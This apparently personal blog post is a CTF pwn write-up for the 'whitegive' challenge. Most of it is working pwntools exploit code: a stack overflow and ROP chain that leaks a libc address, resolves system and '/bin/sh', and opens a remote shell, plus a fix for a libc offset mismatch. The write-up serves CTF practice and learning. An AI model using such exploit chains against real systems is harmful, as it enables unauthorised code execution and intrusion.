2023-05-03
pwn
Note: this article was written 630 days ago and last modified 630 days ago; some of the information in it may be out of date.

Contents

exp

Check (checksec output):

[image: image-20230503053138286]

exp

```python
from pwn import *
from LibcSearcher import *

context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'split', '-h'])
io = remote('node2.anna.nssctf.cn', 28091)
#io = process('./whitegive')
elf = ELF('./whitegive')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x0400763          # pop rdi ; ret

# Stage 1: overflow the 0x10-byte buffer plus the saved rbp, call puts(puts@got)
# to leak the resolved libc address, then return to main for a second overflow
payload = b'a' * (0x10 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))   # puts prints 6 address bytes, then '\n'
print(hex(puts_addr))

# Stage 2: identify the libc from the leaked puts, compute system and "/bin/sh"
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x10 + 8) + p64(pop_rdi) + p64(binsh) + p64(system)
io.send(payload)
io.interactive()
```

This challenge was a bit of a torment:

The libc version I found kept being wrong, error: sh: 1: d: not found

A bit frustrating. Later, reading the writeups and discussion from the experts, it was said that the version LibcSearcher finds differs from the actual one, so the real binsh offset is the found one plus 0x40.

So the final exp:

```python
from pwn import *
from LibcSearcher import *

context(log_level='debug', arch='amd64', os='linux', terminal=['tmux', 'split', '-h'])
io = remote('node2.anna.nssctf.cn', 28091)
#io = process('./whitegive')
elf = ELF('./whitegive')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x0400763          # pop rdi ; ret

# Stage 1: leak puts@got through puts, then return to main
payload = b'a' * (0x10 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(puts_addr))

# Stage 2: LibcSearcher matched a different libc build than the remote one;
# the real "/bin/sh" string sits 0x40 past the offset it reports
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x10 + 8) + p64(pop_rdi) + p64(binsh + 0x40) + p64(system)
io.send(payload)
io.interactive()
```

Author: Hyrink

Copyright notice: Unless otherwise stated, all articles on this blog are licensed under BY-NC-SA. Please credit the source when reposting!